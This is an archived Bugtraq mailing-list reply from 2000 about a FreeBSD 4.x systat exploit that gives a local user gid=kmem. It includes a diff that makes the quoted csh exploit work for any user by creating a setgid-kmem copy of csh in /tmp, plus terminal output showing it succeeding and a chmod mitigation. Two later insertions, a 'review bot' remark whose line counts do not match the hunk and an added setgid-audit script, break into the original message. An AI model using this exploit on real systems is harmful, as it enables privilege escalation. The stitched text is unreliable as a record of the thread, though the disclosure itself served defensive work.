[17149] in bugtraq
Re: FreeBSD 4.x systat exploit
daemon@ATHENA.MIT.EDU (Steve Reid)
Tue Oct 10 23:59:19 2000
Message-ID: <20001010182844.F9112@grok>
Date: Tue, 10 Oct 2000 18:28:44 -0700
Reply-To: Steve Reid <sreid@SEA-TO-SKY.NET>
From: Steve Reid <sreid@SEA-TO-SKY.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20001010145217.I94343@riget.scene.pl>; from Przemyslaw Frasunek on Tue, Oct 10, 2000 at 02:52:17PM +0200
On Tue, Oct 10, 2000 at 02:52:17PM +0200, Przemyslaw Frasunek wrote:
> #!/bin/csh
>
> # (c) 2000 Przemysław Frasunek <venglin@freebsd.lublin.pl>
> #
> # FreeBSD 4.x systat gid=kmem exploit
> # Idea by: Jouko Pynnönen <jouko@SOLUTIONS.FI>
> #
> # Dedicated to ksm.
[etc]
It doesn't work as posted. But that doesn't mean systat is safe, it
just means you aren't "venglin":
--- exploit.csh.orig Tue Oct 10 17:42:49 2000
+++ exploit.csh Tue Oct 10 17:46:53 2000
@@ -11,7 +11,7 @@
#!/bin/csh
cp /bin/csh /tmp
-/usr/sbin/chown venglin.kmem /tmp/csh
+chgrp kmem /tmp/csh
chmod 2755 /tmp/csh
__EOF__
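Review bot: the hunk header `@@ -11,7 +11,7 @@` promises seven lines on each side, but only five old and five new lines appear between it and `__EOF__`, so the patch as quoted will not apply cleanly with patch(1); either two blank context lines were lost in the mail and should be restored, or the header should be corrected to `@@ -11,5 +11,5 @@` to match what is actually shown.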
And now it works:
steve@grok:/home/steve% ./exploit.csh
-rwxr-sr-x 1 steve kmem 622908 Oct 10 18:15 /tmp/csh
steve@grok:/home/steve% uname -srm
FreeBSD 4.1-RELEASE i386
BTW, /usr/bin/top is also linked to ncurses. I don't know if it's
vulnerable or not (the exploit does nothing to top in my limited
testing) but it might be prudent to remove the setgid bit from it too.
chmod a-s /usr/bin/systat /usr/bin/top
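As an added example, not part of the original thread: a small audit script for the situation the reply describes, listing setgid executables under a directory together with their group and whether they link against ncurses, so an administrator can see which setgid-kmem binaries (systat, top, and anything else) share the implicated library before deciding what to `chmod a-s`. It assumes POSIX find/ls/awk and an ldd(1); the function names and the default directory are mine.

```shell
#!/bin/sh
# Added example (hypothetical helper, not from the original post):
# enumerate setgid files under a directory and report, per file,
# its group and whether ldd shows it linked against ncurses.
# Files ldd cannot inspect (scripts, static binaries, or no ldd
# installed) are reported as "unknown" rather than guessed at.

# Print one line per setgid file under $1 (default /usr/bin):
#   <path> <group> <ncurses|no-ncurses|unknown>
audit_setgid() {
    dir=${1:-/usr/bin}
    find "$dir" -type f -perm -2000 2>/dev/null | while read -r f; do
        grp=$(ls -ld "$f" | awk '{print $4}')
        if libs=$(ldd "$f" 2>/dev/null); then
            case $libs in
                *ncurses*) link=ncurses ;;
                *)         link=no-ncurses ;;
            esac
        else
            link=unknown
        fi
        printf '%s %s %s\n' "$f" "$grp" "$link"
    done
}

# Count the setgid files under $1 owned by group $2 (e.g. kmem), the
# combination this thread is about; prints the count (0 if none).
count_setgid_in_group() {
    audit_setgid "$1" | awk -v g="$2" '$2 == g { n++ } END { print n + 0 }'
}
```

Run `audit_setgid /usr/bin` to see the list, or `count_setgid_in_group /usr/bin kmem` for just the kmem count; the thread's own remediation for each hit is `chmod a-s` on that path.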